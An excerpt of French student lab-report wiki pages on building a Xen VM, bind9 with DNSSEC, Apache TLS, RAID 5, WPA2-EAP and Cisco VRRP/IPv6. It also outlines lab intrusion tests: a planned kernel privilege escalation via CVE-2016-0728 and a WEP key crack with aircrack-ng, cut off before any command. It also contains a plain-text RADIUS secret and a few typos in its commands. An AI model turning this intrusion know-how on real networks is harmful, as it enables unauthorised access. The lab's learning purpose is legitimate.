&lt;br /&gt;
Pour accéder via ssh à la machine, il suffit de s'y connecter via les identifiants habituels.&lt;br /&gt;
&lt;br /&gt;
===Modification host DNS et configuration de bind9===&lt;br /&gt;
&lt;br /&gt;
====Modification sur gandi.net====&lt;br /&gt;
Afin d'être identifiable sur le net, nous avons besoin d'un DNS sur notre VM.&lt;br /&gt;
&lt;br /&gt;
Pour cela, nous créons un glue record sur gandi.net pour morillon avec l'adresse web externe : 193.48.57.183 en attribuant comme nameserver ns1.morillon.website&lt;br /&gt;
&lt;br /&gt;
Ainsi, nous pouvons exporter le DNS sur notre serveur tel que le nameserver 1 est le notre : ns1.morillon.website et le 2, comme adressage de secours : ns6.gandi.net&lt;br /&gt;
&lt;br /&gt;
Malheureusement, bien qu'on ait demandé à gandi d'exporter le nameserver le dimanche 1er novembre vers 12h30, celui-ci n'a pas pris en compte notre demande.&lt;br /&gt;
&lt;br /&gt;
Elle fut redemandé le 2 novembre...&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
MàJ du 16/11:&lt;br /&gt;
&lt;br /&gt;
Après vérification, une erreur de type couillon sur le glue record a probablement empêché le bon déroulement de l'opération : l'adresse ip renseignée était 193.57.48.183 au lieu de 193.48.57.183...&lt;br /&gt;
&lt;br /&gt;
MàJ du 30/11:&lt;br /&gt;
&lt;br /&gt;
Migration réussie&lt;br /&gt;
&lt;br /&gt;
MàJ du 09/12:&lt;br /&gt;
&lt;br /&gt;
Après plusieurs modifications, le site est up et la page par défaut d'apache2 avec une petite modification pour confirmer le fonctionnement.&lt;br /&gt;
&lt;br /&gt;
====Configuration de bind9====&lt;br /&gt;
&lt;br /&gt;
Après installation&lt;br /&gt;
    apt install bind9&lt;br /&gt;
&lt;br /&gt;
nous avons configuré bind9 dans le dossier local de la VM&lt;br /&gt;
    /etc/bind/&lt;br /&gt;
&lt;br /&gt;
Le fichier db.morillon.website a été créé. Nous y avons ajouté les lignes suivantes :&lt;br /&gt;
&lt;br /&gt;
 BIND data file for local loopback interface;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.morillon.website. postmaster.morillon.website. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.morillon.website.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.183&lt;br /&gt;
&lt;br /&gt;
MàJ du 09/12&lt;br /&gt;
&lt;br /&gt;
Plusieurs modifications ont été effectuées sur le ficiher db.morillon.website:&lt;br /&gt;
&lt;br /&gt;
Modification des A record, serveur mail et web, passage au serial contenant date de modification:&lt;br /&gt;
&lt;br /&gt;
    ;BIND data file for local loopback interface&lt;br /&gt;
    ;&lt;br /&gt;
    $TTL    86400&lt;br /&gt;
    @       IN      SOA     ns1.morillon.website. postmaster.morillon.website. (&lt;br /&gt;
                     2020120705         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                          86400 );       ; Negative Cache TTL&lt;br /&gt;
 &lt;br /&gt;
   @        IN      NS      ns1.morillon.website.&lt;br /&gt;
   @        IN      NS      ns6.gandi.net.&lt;br /&gt;
   @        IN	    MX	    100 mail&lt;br /&gt;
   mail	    IN	    A	    193.48.57.183&lt;br /&gt;
   ns1	    IN	    A       193.48.57.183&lt;br /&gt;
   www	    IN	    CNAME   ns1&lt;br /&gt;
&lt;br /&gt;
mail passé en A car warning de bind9 alertant l'illégalité d'un mail en CNAME&lt;br /&gt;
&lt;br /&gt;
Ajout d'une zone inverse dans le fichier db.193: &lt;br /&gt;
&lt;br /&gt;
   ; BIND reverse data file for local loopback interface&lt;br /&gt;
   ;&lt;br /&gt;
   $TTL	604800&lt;br /&gt;
   @	IN	SOA	ns1.morillon.website. postmaster.morillon.website. (&lt;br /&gt;
        2020120703		; Serial&lt;br /&gt;
            604800		; Refresh&lt;br /&gt;
             86400		; Retry&lt;br /&gt;
           2419200		; Expire&lt;br /&gt;
            604800 );	; Negative Cache TTL&lt;br /&gt;
   ;&lt;br /&gt;
   @	IN	NS	ns1.&lt;br /&gt;
   183	IN	PTR	ns1.morillon.website.&lt;br /&gt;
   183	IN 	PTR	mail.morillon.website.&lt;br /&gt;
&lt;br /&gt;
Avec une entrée pour chaque A record&lt;br /&gt;
&lt;br /&gt;
Modification du fichier named.conf.options :&lt;br /&gt;
&lt;br /&gt;
    ...&lt;br /&gt;
    	listen-on-v6 { any; };&lt;br /&gt;
        listen-on { any; };&lt;br /&gt;
        allow-recursion {127.0.0.1; 193.48.57.183; 217.70.177.40;};&lt;br /&gt;
        allow-query-cache {127.0.0.1; 193.48.57.183;};&lt;br /&gt;
    ...&lt;br /&gt;
&lt;br /&gt;
Ajout de l'IP publique et du dns gandi pour les récursions, query-cache réduit pour empêcher usurpation&lt;br /&gt;
Des request denied dans le log confirme le bon fonctionnement :&lt;br /&gt;
&lt;br /&gt;
    ...&lt;br /&gt;
    Dec  9 08:42:51 morillon named[1923]: client @0x7f1a44056fa0 88.80.186.137#43549 (193-48-57-183-5fd02192.spiderprobe.com): query (cache) \&lt;br /&gt;
    '193-48-57-183-5fd02192.spiderprobe.com/A/IN' denied&lt;br /&gt;
    Dec  9 11:07:56 morillon named[1923]: client @0x7f1a44056fa0 1.158.72.169#80 (sl): query (cache) 'sl/ANY/IN' denied&lt;br /&gt;
    Dec  9 11:07:57 morillon named[1923]: client @0x7f1a44056fa0 1.158.72.169#80 (sl): query (cache) 'sl/ANY/IN' denied&lt;br /&gt;
    Dec  9 11:07:57 morillon named[1923]: client @0x7f1a44056fa0 1.158.72.169#80 (sl): query (cache) 'sl/ANY/IN' denied&lt;br /&gt;
    ...&lt;br /&gt;
&lt;br /&gt;
Modification du fichier named.conf.local :&lt;br /&gt;
&lt;br /&gt;
   ...&lt;br /&gt;
   zone &amp;quot;57.48.193.in-addr.arpa&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        notify no;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.193&amp;quot;;&lt;br /&gt;
   };&lt;br /&gt;
   ...&lt;br /&gt;
&lt;br /&gt;
Pour zone de recherche inverse&lt;br /&gt;
&lt;br /&gt;
Modification du fichier de lancement /etc/default/bind9 pour un mode IPv4 pour l'instant:&lt;br /&gt;
    &lt;br /&gt;
    ...&lt;br /&gt;
    OPTIONS=&amp;quot; -4 -u bind&amp;quot;&lt;br /&gt;
    ...&lt;br /&gt;
&lt;br /&gt;
====Configuration du DNSSEC====&lt;br /&gt;
&lt;br /&gt;
[[Fichier:dnssec_morillon.png|right]]&lt;br /&gt;
&lt;br /&gt;
Pour configurer bind9 avec dnssec, nous générons d'abord les clés KSK et ZSK:&lt;br /&gt;
&lt;br /&gt;
    dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE morillon.website&lt;br /&gt;
    dnssec-keygen -a RSASHA1 -b -b 1024 -n ZONE morillon.website&lt;br /&gt;
&lt;br /&gt;
Pour plus de clarté :&lt;br /&gt;
    mv Kmorillon.website.+005+59473.key morillon.website-ksk.key&lt;br /&gt;
    mv Kmorillon.website.+005+59473.private morillon.website-ksk.private&lt;br /&gt;
&lt;br /&gt;
    mv Kmorillon.website.+005+52512.key morillon.website-zsk.key&lt;br /&gt;
    mv Kmorillon.website.+005+52512.private morillon.website-zsk.private&lt;br /&gt;
&lt;br /&gt;
Ajout dans le fichier named.conf.options des options propres au DNSSEC:&lt;br /&gt;
    ...&lt;br /&gt;
    dnssec-enable yes;&lt;br /&gt;
    dnssec-validation yes;&lt;br /&gt;
    dnssec-lookaside yes;&lt;br /&gt;
    ...&lt;br /&gt;
&lt;br /&gt;
Ajout dans le fichier de zone db.morillon.website des clés: &lt;br /&gt;
    $include /etc/bind/morillon.website.dnssec/morillon.website-ksk.key&lt;br /&gt;
    $include /etc/bind/morillon.website.dnssec/morillon.website-zsk.key&lt;br /&gt;
&lt;br /&gt;
Incrémentation du revision code&lt;br /&gt;
&lt;br /&gt;
Signature du fichier de zone par l'utilitaire dnssec :&lt;br /&gt;
    dnssec-signzone -o morillon.website -k morillon.website-ksk db.morillon.website morillon.website-zsk&lt;br /&gt;
&lt;br /&gt;
''Nous avons eu un problème lors de la signature du fichier de zone, pour cela nous avons dû rajouter le timeout dans les fichiers de clés :&lt;br /&gt;
    morillon.website. '''3600''' IN DNSKEY 257 3 5 AwEAAfVX0ANdFDm...&lt;br /&gt;
&lt;br /&gt;
Apparemment à cause de l'option -L absente lors de la création des clés.&lt;br /&gt;
&lt;br /&gt;
Modification du fichier named.conf.local pour changement du fichier de zone à charger :&lt;br /&gt;
    ... &lt;br /&gt;
    //file &amp;quot;/etc/bind/db.morillon.website&amp;quot;;&lt;br /&gt;
    file &amp;quot;/etc/bind/db.morillon.website.signed&amp;quot;;&lt;br /&gt;
    ...&lt;br /&gt;
&lt;br /&gt;
Redémarrage du serveur bind9 avec la nouvelle configuration :&lt;br /&gt;
    service reload bind9&lt;br /&gt;
&lt;br /&gt;
Puis partage des clés KSK et ZSK avec gandi.net dans la zone registrar (utilisation d'un algorithme RSA/SHA1 (5))&lt;br /&gt;
&lt;br /&gt;
Lors d'un host -t any, nous obtenons :&lt;br /&gt;
    morillon.website has RRSIG record NSEC 5 2 86400 20210113121019 20201214121019 52512 morillon.website. nIhQAoZ568EQQ9eOl5H11UqnE49RW62604sey8RqnpVV1GWO4Rp5fkX4 7aOmVVljXVpnFvBfcfVYI430VHGKJUjUwSgSQSFFrLsKqETAp2PZFosH qEX1ml7c6U5SGpWdlkMtisLCxYfYn8/r2R25MZtrZsIsW543Zx6kXSzP 4CI=&lt;br /&gt;
    morillon.website has NSEC record mail.morillon.website. NS SOA MX RRSIG NSEC DNSKEY&lt;br /&gt;
    morillon.website has RRSIG record MX 5 2 86400 20210113121019 20201214121019 52512 morillon.website. GYKvgQe+6dfZkrevA3TXyJS82o77qWlRl/pNsE0I41Ku7FT1RgifPDll kXnqRl9G70iT4cRB9dNa/F+7RTcvY276in44lMkAzRlMWARG8+hYBhhq 5nvNN4kJpDZ7dKIpTc/wMu7SGiMZYKKrJOeK/pdarxI4ZHyqhDMiCW/X 9hE=&lt;br /&gt;
    morillon.website mail is handled by 100 mail.morillon.website.&lt;br /&gt;
    morillon.website has RRSIG record NS 5 2 86400 20210113121019 20201214121019 52512 morillon.website. RuAS5LH4UEmd+FIjzD522vwJcrGYlNuUuZYsDAFy0JiMGuOse5EKAWOi 01NWxfLAPGCDlj9Dj4QfyxSA+GhIJPEU25kcR44Nv/LQn1FsJZlQT8XM QkUnAXSlchrIlKg+XaSCTGjjfB1rE5Oba7PUwYgQ5CC7C7etvXegp2QV Ju0=&lt;br /&gt;
    morillon.website has RRSIG record SOA 5 2 86400 20210113121019 20201214121019 52512 morillon.website. i+0smnpl1ASGvURvV3lL/BuL6Zw/s3yjslMRUIKbOkE4tM/zgqF5RrTb gHOkj3PcZSSaO31O3vKUz6S0iPo/YWQvdaF0aHDcyvLQgCLiP6vpNwF+ mwOO821Jto39AM+3cuWCsytKECqKH4LoDMxkw/MUi6DJe40eAD8HEf2P 8iQ=&lt;br /&gt;
    morillon.website has SOA record ns1.morillon.website. postmaster.morillon.website. 2020120706 604800 86400 2419200 86400&lt;br /&gt;
    morillon.website has RRSIG record DNSKEY 5 2 3600 20210113121019 20201214121019 52512 morillon.website. VGQyJDSf38xOBJymFK/DYLO/UYPEoIspsqZpPPnX+nPjUdR5Tw3tILPT 5AfZWAChlgQ8AnfLzxum/znpKI66EbeqTHvg1J/FjMBvlsyyLjwqjn6w u7JzquC/fbpq4HsskLFgpl1Z1zNuQAJB9xBGOJR8BpCHBRc8ubp1tUzy I2k=&lt;br /&gt;
    morillon.website has RRSIG record DNSKEY 5 2 3600 20210113121019 20201214121019 59473 morillon.website. Tz3BwfoPt+loiqbWuQnbDdl57L6eXQ+dv+ZvXzcrvCSTXy/UKNRjs39d t6j6krwo4eZk6blXGgDEm93D67AmkQHmus9NYL9VgR0eG/NPHIodozzq aai4jXKwcOnk8O3d/nObyOERvGbnD9znUVGtgiUDCcY7UaXBogewFyCR Zxq69+FdFvmIXwriHHRRiaN/Bf4r/+djB46AcZEpbtvq1475BfJ6qYe/ VxW5odv1wcr9k8Sy/27LMbaHzdX9OWqdYLge3vfBRa8VMW+R57tx+M0p mtmOExUgc3mmnsVLP89L2M85MMTcbaup1RJIG4L33CaYEl9hOiaki4j8 CW5GHg==&lt;br /&gt;
    morillon.website has DNSKEY record 257 3 5 AwEAAfVX0ANdFDmDRKIBUMhso53F9LjZnc3lKHwHZHe3xiyLnFC+rQyc CQH+xg5g0UvDSLtoTFRtMiA4AyY6d8fywjmNFVluu64iDWyZkIVdiZLm XkfDdt4lz2+rxE1IkncbCYKkOk5cwkXYtxR/z/leOyZPX4i8Q1fhMfJG jUzNnZ1dATz0WGTb5qoGU9mEzVOH1WH4SkHc+acXkfBn6MtgR/DNJKDw 5huO3LMuA/ZyfwZU7lHhID97MMdpIwTIjd/nJLCjNY6rUP4OzZka7VjQ n/lOZ2UGMjOn+4QQqKDvmLohUOBsNFyY7PnSvsV9j5riNEZfuBx863QN 0PSBfK9cA4M=&lt;br /&gt;
    morillon.website has DNSKEY record 256 3 5 AwEAAaZUpNecSfAJ70amN3b4lcgpOAKXwbeJRogxxJEaqoSa0meQm6PY ZHAJFkxMMi78X+qVQeZr206VozCjPhysAWK6G45h/yY73Xzw1s0KzLwf L6FOhcn7KWzf2CIm6RfH5hwRLyuDriAaVVdKPxN/CkW9LIXRzm5LWSdz hqsZrhsz&lt;br /&gt;
    morillon.website name server ns6.gandi.net.&lt;br /&gt;
    morillon.website name server ns1.morillon.website.&lt;br /&gt;
&lt;br /&gt;
Cela fonctionne correctement.&lt;br /&gt;
&lt;br /&gt;
===Apache2 et sécurisation du serveur===&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser le serveur et accéder à notre site web apache2, ce dernier a besoin d'un certificat.&lt;br /&gt;
&lt;br /&gt;
Pour l'obtenir, nous avons tout d'abord créer un CSR et une private key dans le dossier home du serveur.&lt;br /&gt;
    openssl req -nodes -newkey rsa:2048 -sha256 -keyout morillon.key -out morillon.csr&lt;br /&gt;
&lt;br /&gt;
Et fourni les éléments d'identification de notre serveur (localisation, nom commun, etc.)&lt;br /&gt;
&lt;br /&gt;
Une fois le .csr et le .key créés, nous transmettons à gandi.net le CSR afin de générer un certificat signé.&lt;br /&gt;
&lt;br /&gt;
Nous avons configué notre serveur pour recevoir des mails, pour cela, nous avons installé 2 paquets :&lt;br /&gt;
&lt;br /&gt;
    postfix&lt;br /&gt;
    bsd-mailx&lt;br /&gt;
&lt;br /&gt;
Puis nous avons ajouté un alias dans le fichier /etc/aliases&lt;br /&gt;
    admin:     root&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de renseigner l'adresse du serveur mail dans le fichier DNS /etc/bind/db.morillon.website&lt;br /&gt;
    @     IN    MX 100 mail&lt;br /&gt;
    mail  IN    CNAME ns1&lt;br /&gt;
    ns1   IN    A   *adresse ip publique*&lt;br /&gt;
&lt;br /&gt;
Grâce à&lt;br /&gt;
    mailx&lt;br /&gt;
&lt;br /&gt;
Nous pouvons vérifier la présence de mail sur notre serveur et recevoir la demande d'authentification de gandi pour générer le certificat.&lt;br /&gt;
&lt;br /&gt;
Une fois obtenue, nous avons 4 fichiers : .key (fichier private key) .csr (fichier certificate) .crt (certificat signé) et .pem (liste des certificats accordés aux autorités signant notre certificat)&lt;br /&gt;
&lt;br /&gt;
Nous configurons par la suite apache2 pour utiliser ces certificats, dans le terminal :&lt;br /&gt;
    a2enmod ssl&lt;br /&gt;
    a2enmod headers&lt;br /&gt;
    service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Maintenant, nous créons un fichier de configuration pour notre serveur:&lt;br /&gt;
    touch /etc/apache2/sites-available/morillon.website.conf&lt;br /&gt;
&lt;br /&gt;
Contenant :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
         Redirect permanent / https://www.morillon.website&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
    #Pour rediriger automatiquement les connexions http vers https&lt;br /&gt;
    &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
        ServerName morillon.website&lt;br /&gt;
        ServerAlias www.morillon.website&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/morillon.website&amp;quot;&lt;br /&gt;
         &amp;lt;Directory &amp;quot;var/www/morillon.website&amp;quot;&amp;gt;&lt;br /&gt;
            Options +FollowSymLinks&lt;br /&gt;
            AllowOverride all&lt;br /&gt;
            Require all granted&lt;br /&gt;
         &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.morillon.website.log&lt;br /&gt;
        CustomLog /var/log/apache2/access.morillon.website.log combined&lt;br /&gt;
        #Paramètres de base pour notre site&lt;br /&gt;
        SSLEngine on&lt;br /&gt;
        SSLCertificateFile &amp;quot;/home/certificates/morillon.website.crt&amp;quot;&lt;br /&gt;
        SSLCertificateKeyFile &amp;quot;/home/certificates/morillon.key&amp;quot;&lt;br /&gt;
        SSLCertificateChainFile &amp;quot;/home/certificates/GandiStandardSSLCA2.pem&amp;quot;&lt;br /&gt;
        #Activation de la sécurité TLS, emplacement des certificats, de la clé privée et des listes de certificats intermédiaires&lt;br /&gt;
        SSLProtocol -ALL +TLSv1 +TLSv1.1 +TLSv1.2&lt;br /&gt;
        SSLHonorCipherOrder On&lt;br /&gt;
        SSLCipherSuite ECDHE-RSA-AES128-SHA256:AES128-GCM-SHA256:HIGH:!MD5:!aNULL:!EDH:!RC4&lt;br /&gt;
        SSLCompression off&lt;br /&gt;
        #Quelques options de sécurité supplémentaires suites aux découvertes sur les failles TLS de 2014&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et nous avons désactivé les autres sites par défaut :&lt;br /&gt;
    a2dissite 000-default.conf&lt;br /&gt;
    a2dissite default-ssl.conf&lt;br /&gt;
&lt;br /&gt;
Et activons notre site:&lt;br /&gt;
    a2ensite morillon.website.conf&lt;br /&gt;
&lt;br /&gt;
===Encryption Clé USB===&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser une clé avec un mot de passe, nous avons utilisé cryptsetup. On s'assure d'abord de partir sur une clé toute propre :&lt;br /&gt;
    fdisk -l&lt;br /&gt;
    #sélection de la clé à formater&lt;br /&gt;
    fdisk /dev/sdb&lt;br /&gt;
    o #creation table MBR&lt;br /&gt;
    n #creation nouvelle partition&lt;br /&gt;
    w #écriture sur la clé&lt;br /&gt;
&lt;br /&gt;
La commande crypsetup utilisée est la suivante :&lt;br /&gt;
    cryptsetup open --type plain /dev/sdb1 encryptedDevice&lt;br /&gt;
    #s'en suit une demande de mdp&lt;br /&gt;
&lt;br /&gt;
Elle monte ensuite dans le dossier ''/dev/mapper'' et il devient possible de la formater :&lt;br /&gt;
    mkfs.ext4 /dev/mapper/encryptedDevice&lt;br /&gt;
&lt;br /&gt;
===Elevation de privilège sur kernel linux===&lt;br /&gt;
&lt;br /&gt;
Pour tester l'élevation de privilège, nous utilisons la faille CVE_2016_0728 qui fonctionne sur les kernels entre 3.6 et 3.18&lt;br /&gt;
Identifié par la team Perception Point&lt;br /&gt;
http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/&lt;br /&gt;
&lt;br /&gt;
Création d'un VM avec KVM d'une debian jessie pour test sur zabeth21.&lt;br /&gt;
&lt;br /&gt;
===Raid 5 Logiciel===&lt;br /&gt;
&lt;br /&gt;
Pour réaliser le raid 5 logiciel, on crée tout d'abord 3 partitions virtuelles via lvcreate:&lt;br /&gt;
    lvcreate -L1G -n JDDTTR5* storage&lt;br /&gt;
&lt;br /&gt;
Ensuite on les lie à la VM dans le fichier /etc/xen/morillon.cfg comme pour les disques home et var.&lt;br /&gt;
&lt;br /&gt;
Après redémarrage de la VM, on installe le paquet mdadm et on crée un raid 5 sur les 3 nouvelles partitions :&lt;br /&gt;
    mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvde /dev/xvdf /dev/xvdg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier la création grâce à :&lt;br /&gt;
    cat /proc/mdstat&lt;br /&gt;
 &lt;br /&gt;
qui nous renvoie :&lt;br /&gt;
    Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
    md0 : active raid5 xvdg[3] xvdf[1] xvde[0]&lt;br /&gt;
         2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&lt;br /&gt;
Lors de la désactivation d'un des disques du raid, les données restent accessibles par reconstruction de la partie manquante à partir de 2 parties existantes ou d'une partie et d'une clé correspondante.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation WiFi par WPA2-EAP===&lt;br /&gt;
&lt;br /&gt;
Le but dans cette étant de permettre à la borne WiFi d'être controlé par WPA2-EAP,&lt;br /&gt;
&lt;br /&gt;
nous avons en sorte que l'identification va se faire en utilisant le même serveur FreeRadius que pour la sécurisation filaire&lt;br /&gt;
&lt;br /&gt;
Pour ce faire :&lt;br /&gt;
&lt;br /&gt;
Nous nous sommes connecté par ssh à notre point d'accès&lt;br /&gt;
 ssh root@10.60.100.10 -c aes128-cbc&lt;br /&gt;
&lt;br /&gt;
Ce qui nous a permis de nous connecter sur le point d'accès wifi-ima5&lt;br /&gt;
&lt;br /&gt;
Une fois dessus nous avons effectué les commandes suivantes :&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc&amp;gt;en&lt;br /&gt;
 wifi-ima5sc# (Après avoir tapé le mot de passe)&lt;br /&gt;
 wifi-ima5sc# config-term&lt;br /&gt;
 wifi-ima5sc(config)# aaa new-model&lt;br /&gt;
 wifi-ima5sc(config)# aaa authentication login eap_group6 group radius_group6&lt;br /&gt;
 wifi-ima5sc(config-sg-radius)# radius-server host 193.48.57.183 auth-port 1812 acct-port 1813 key secret_group6&lt;br /&gt;
 wifi-ima5sc(config)# aaa group server radius radius_group6&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# dot11 ssid morillon&lt;br /&gt;
 wifi-ima5sc(config-ssid)# vlan306&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication open eap eap_group6&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication network-eap eap_group6&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication key-management wpa&lt;br /&gt;
 wifi-ima5sc(config-ssid)# mbssid Guest mode&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# int dot11radio0&lt;br /&gt;
 wifi-ima5sc(config-if)# encryption vlan 306 mode ciphers aes-ccm tkip&lt;br /&gt;
 wifi-ima5sc(config-if)# mbssid&lt;br /&gt;
 wifi-ima5sc(config-if)# encryption vlan 306 mode ciphers aes-ccm tkip&lt;br /&gt;
 wifi-ima5sc(config-if)# ssid morillon&lt;br /&gt;
 &lt;br /&gt;
 wifi-ima5sc(config)# int dot11radio0.6&lt;br /&gt;
 wifi-ima5sc(config-subif)#encapsulation dot1Q 6&lt;br /&gt;
 wifi-ima5sc(config-subif)#bridge-group 6&lt;br /&gt;
&lt;br /&gt;
===Configuration VRPP===&lt;br /&gt;
&lt;br /&gt;
Sur le routeur 6509-E&lt;br /&gt;
&lt;br /&gt;
 (config)# vlan 306&lt;br /&gt;
 (config-if)# vrrp 46 ip 10.60.106.254&lt;br /&gt;
 (config-if)# vrrp 46 preempt&lt;br /&gt;
 (config-if)# vrrp 46 priority 110&lt;br /&gt;
&lt;br /&gt;
Sur le routeur C9200&lt;br /&gt;
&lt;br /&gt;
 (config)# vlan 306&lt;br /&gt;
 (config-if)# vrrp 46 address-family ipv4&lt;br /&gt;
 (config-if-vrrp)# address 10.60.106.254&lt;br /&gt;
 (config-if-vrrp)# preempt&lt;br /&gt;
 (config-if-vrrp)# vrrpv2&lt;br /&gt;
&lt;br /&gt;
===Configuration IPv6===&lt;br /&gt;
&lt;br /&gt;
Afin d'effectuer la configuration IPv6 nous avons procédé aux étapes suivantes :&lt;br /&gt;
&lt;br /&gt;
Sur le routeur 6509-E :&lt;br /&gt;
&lt;br /&gt;
 (config)# int vlan 306&lt;br /&gt;
 (config-if)# no shut&lt;br /&gt;
 (config-if)# ip address 10.60.106.1 255.255.255.0&lt;br /&gt;
 (config-if)# ipv6 enable&lt;br /&gt;
 (config-if)# ipv6 address 2001:660:4401:60b8::0/64 eui-64&lt;br /&gt;
 (config-if)# ipv6 nd prefix 2001:660:4401:60b8::0/64 1000 900&lt;br /&gt;
 (config-if)# ipv6 nd router-preference High&lt;br /&gt;
&lt;br /&gt;
Sur le routeur C9200 :&lt;br /&gt;
&lt;br /&gt;
 (config)#int vlan 306&lt;br /&gt;
 (config-if)#no shut&lt;br /&gt;
 (config-if)#ip address 10.60.106.2 255.255.255.0&lt;br /&gt;
 (config-if)#ipv6 enable&lt;br /&gt;
 (config-if)#ipv6 address 2001:660:4401:60b8::0/64 eui-64&lt;br /&gt;
 (config-if)#ipv6 nd prefix 2001:660:4401:60b8::0/64 1000 900&lt;br /&gt;
 (config-if)#ipv6 nd router-preference Low&lt;br /&gt;
&lt;br /&gt;
Notre machine arrive à recupérer une adresse IP&lt;br /&gt;
&lt;br /&gt;
 IMA5sc-R1#sh ip dhcp bin               &lt;br /&gt;
 IMA5sc-R1#sh ip dhcp binding &lt;br /&gt;
 IP address       Client-ID/	 	 Lease expiration        Type&lt;br /&gt;
		 Hardware address&lt;br /&gt;
 10.60.106.100    0146.f879.9094.cf       Jun 01 2000 04:53 AM    Automatic&lt;br /&gt;
 IMA5sc-R1#ping 10.60.106.100&lt;/div&gt;</summary>
		<author><name>Jnduwamu</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=54630</id>
		<title>TP sysres IMA5sc 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G6&amp;diff=54630"/>
				<updated>2020-12-14T17:26:10Z</updated>
		
		<summary type="html">&lt;p&gt;Jnduwamu : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=== Création de la machine virtuelle ===&lt;br /&gt;
&lt;br /&gt;
Pour créer la machine virtuelle, une fois connecté sur le serveur capbreton, la commande utilisée est la suivante : &lt;br /&gt;
  ssh capbreton.plil.info&lt;br /&gt;
  su -&lt;br /&gt;
  xen-create-image --hostname=morillon --dist=buster --ip=100.64.0.21 --netmask=255.255.255.240 --dir=/usr/local/xen/ --gateway=100.64.0.5 --force&lt;br /&gt;
&lt;br /&gt;
Cependant, nous obtenions une erreur de type '''mkswap''' absent.&lt;br /&gt;
&lt;br /&gt;
Pour répondre à ce problème, nous avons essayé de recompiler la dernière version des '''linux-utils''', de les configurer et de les installer.&lt;br /&gt;
&lt;br /&gt;
Cela a bien fonctionné mais n'a pas répondu au problème et finalement a fait bugué l'ensemble du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
Pour récupérer des utilitaires fonctionnels, M. Redon a dû réinstaller les utilitaires depuis la commande apt en vérifiant les numéros de version au préalable.&lt;br /&gt;
&lt;br /&gt;
La prochaine fois, nous ferons bien attention à rajouter un tiret pour se connecter en root (su -)...&lt;br /&gt;
&lt;br /&gt;
Pour créer les disques virtuels, au préalable, commande '''pvcreate''' sur les disques physiques&lt;br /&gt;
  lvcreate /dev/sde /dev/sdf storage pour créer le volume logique&lt;br /&gt;
  lvcreate -L10G -n JeandedieuTheauX storage&lt;br /&gt;
&lt;br /&gt;
Pour créer deux partitions logiques.&lt;br /&gt;
&lt;br /&gt;
Pour les monter dans les dossier '''/var''' et '''/home''' de la VM, nous les formattons (mkfs.ext4)&lt;br /&gt;
Puis modifions le fichier de configuration de la VM --&amp;gt; ajout des lignes &lt;br /&gt;
  'phy:/dev/storage/JeandedieuTheauX,xvdavY,w'&lt;br /&gt;
  X=[1 || 2]; Y = [3 || 4]&lt;br /&gt;
&lt;br /&gt;
Au passage, nous modifions la ligne vif --&amp;gt; ajout à la fin du bridge : &lt;br /&gt;
  bridge=IMA5sc&lt;br /&gt;
&lt;br /&gt;
Après le boot de la VM : &lt;br /&gt;
  xl create -c /etc/xen/morillon.cfg &lt;br /&gt;
  xl console morillon (si active) &lt;br /&gt;
&lt;br /&gt;
Nous modifions le fichier ''''/etc/fstab''' pour monter automatiquement les dossiers /var et /home sur les partitions '''xvdav'''.&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion  ===&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès WiFi ====&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, nous avons chercher à effectuer une intrusion sur un point d'accès WiFi&lt;br /&gt;
&lt;br /&gt;
Nous avons pour cela installé le paquetage aircrack-ng qui est un programme de surveillance des réseaux sans fil &lt;br /&gt;
&lt;br /&gt;
Il permet de ce fait d'effectuer un cassage des clés WEP ou WPA par exemple&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous allons utiliser le programme pour cracker un des points d'accès : cracotte06&lt;br /&gt;
&lt;br /&gt;
Nous retrouvons le nom de son BSSID et son channel grâce à la commande suivante :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
